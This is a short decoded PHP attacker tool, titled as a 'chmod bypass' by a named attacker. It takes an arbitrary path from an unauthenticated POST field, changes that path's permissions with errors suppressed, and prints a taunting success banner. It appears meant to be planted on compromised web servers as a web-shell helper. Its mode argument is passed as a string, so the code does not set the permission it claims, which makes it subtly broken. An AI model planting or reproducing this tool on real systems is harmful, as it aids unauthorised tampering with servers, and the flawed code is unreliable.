/* Decoded by unphp.net */
?>
Bypass Chmod Directory Priv8 By Mauritania Attacker
if($_POST)
{
$mauritania = $_POST['file'];
$ch = @chmod($mauritania,'0311');
if($ch)
{
echo "[+] Directory =>{$mauritania} => [+] Permission Changed Successfully Bypassed ^_^ [+]";
}
else
{
echo "[-] Directory =>{$mauritania} => [-] Permission can't be changed , maybe chmod function is disabled :( [-]";
}
}
?>